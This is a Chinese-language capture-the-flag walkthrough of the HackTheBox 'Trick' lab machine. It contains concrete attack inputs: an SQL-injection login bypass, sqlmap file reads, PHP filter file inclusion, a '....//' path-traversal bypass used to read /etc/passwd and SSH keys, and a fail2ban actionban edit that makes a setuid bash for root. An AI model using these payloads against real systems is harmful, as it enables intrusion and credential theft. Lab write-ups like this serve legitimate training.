信息收集

端口扫描

首先使用nmap对端口进行探测。找到了SSH (22) 和 HTTP (80)。2个端口。


接着使用nmap对SMTP 协议去爆破一些用户名


使用脚本爆破SMTP协议

使用smtp-user-enum 脚本来检查这些用户：


使用telnet发现也不能成功


DNS协议

使用 DNS来看域名的的解析情况


子域名枚举

接着使用wfuzz对子域名进行枚举



访问主页查看页面有没有一些可用的东西


漏洞利用

万能密码登录

当我搜索http://preprod-payroll.trick.htb时，它会自动将我重定向到登录页面。


然后f12查看到，是一个员工管理系统，然后搜索nday漏洞。发现该系统存在sql注入漏洞


漏洞详情链接：

https://www.sourcecodester.com/php/14475/payroll-management-syste
m-using-phpmysql-source-code.html


使用' or 1=1--，对该网站可以通过万能密码登录


sql注入漏洞

手动测试

登录框处存在一个时间盲注。

进行手动测试，输入1=1 和1=2进行对比，发现返回的结果1个是1，1个是



sqlmap测试

接着使用sqlmap进行从测试。

先判断注入点：sqlmap -r x.txt --dbms --batch


然后找到注入点之后，使用--current-user枚举当前数据库的用户


接着去枚举数据库里面的表



接着去枚举表里面的用户


使用sqlmap读取文件

可以配置 SQL，以便我可以通过注入读取文件。sqlmap允许使用--file-read参数。有用：


接着使用wfuzz枚举子域名。成功枚举出新的子域名


文件包含漏洞

该网站在使用前面的万能密码登录之后，存在文件包含漏洞。接着尝试使用 PHP 过滤器对
URL 进行本地文件包含 (LFI)。

http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-en
code/resource=index

先去读doductions文件，然后使用base64解密。


接着去读index文件，然后解密之后发现新的php


接着继续去读login文件。继续解密


最后发现了db_connect.php,读出了数据库的用户名和密码



接着就可以使用ssh进行登录


目录遍历漏洞

源码分析

目录遍历

尝试在 web 目录之外加载一个文件（/etc/passwd这是一个通用文件，因为它是世界可读的并且总是在
同一个地方）使用绝对路径（http://preprod-marketing.trick.htb/index.php?page=/etc/passwd）
和相对路径（ ）都会失败http://preprod-marketing.trick.htb/index.p
hp?page=../../../../../../../../../etc/passwd。

阅读 index.php 源码

只需包含index.php类似http://preprod-marketing.trick.htb/index.php?page=index.php, as 的index.php
内容将再次执行，而不是返回源代码。尝试获取源代码的一种方法是使用 PHP 过滤器。访问http://preprod-
marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=index.php可以在
包含之前进行base64编码index.php，然后只会出现base64文件。接着继续使用sqlmapap读文件--file-re
ad=/var/www/market/index.php


发现源码将../进行过滤。我们可以使用....//进行绕过。

<?php
$file = $_GET['page'];

if(!isset($file) || ($file=="index.php")) {
   include("/var/www/market/home.html");
}
else{
        include("/var/www/market/".str_replace("../","",$file));
}


成功遍历到了/etc/passwd


接着去遍历id_rsa。


ssh远程连接

然后将其加到本地文件中，使用chmod增加权限，继续使用ssh远程连接


获取user.txt

连接之后，成功获取到user.txt文件


权限提升

fail2ban提权

配置分为三个部分fail2ban：
过滤器定义要在给定日志文件中查找的模式。
一个动作定义了可能发生的事情（比如iptables正在制定的规则）。
将过滤器连接到动作。

使用suo -l 检查该用户运行那些程序。
发现michael 可以fail2ban以 root 身份重新启动。
文章链接：https://grumpygeekwrites.wordpress.com/2021/01/29/p
rivilege-escalation-via-fail2ban/




然后进入fail2ban目录


漏洞利用

接着进行漏洞操作。修改其配置文件。

mv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.bak
cp /etc/fail2ban/action.d /iptables-multiport.bak /etc/fail2ban/action.d/iptables-multiport.conf
ls -l /etc/fail2ban/action.d/iptables-multiport.conf  


然后使用crackmapexec进行爆破


接着使用nano进行编辑配置文件



对actionban进行修改。重启服务之后，发现还是不能触发漏洞



重启环境之后，继续进行第二次测试。

使用vi对配置文件进行编辑。

actionban=cp/bin/bash/tmp/x; chmod4777/tmp/x


接着重启服务


继续使用crakmapexec进行爆破，触发漏洞


获取root.txt

成功触发漏洞，然后使用/tmp/x -p执行命令。

最后成功获取到root.txt。


总结

该靶机首先，通过一个ip，然后对ip进行信息收集，发现开放了22，80，25端口，接着使用脚本探测SMTP协议中存
在那些用户，接着使用wfuzz进行文件子域名枚举。漏洞利用：主要是登录框存在sql注入和万能密码登录。登录进行
之后，存在文件包含漏洞，接着读一些关键的文件，然后继续fuzz子域名。发现子域名的框架也存在文件包含漏洞
然后获取id_rsa，然后登录ssh。接着使用新的一种提权方式-滥用fail2ban进行权限提升。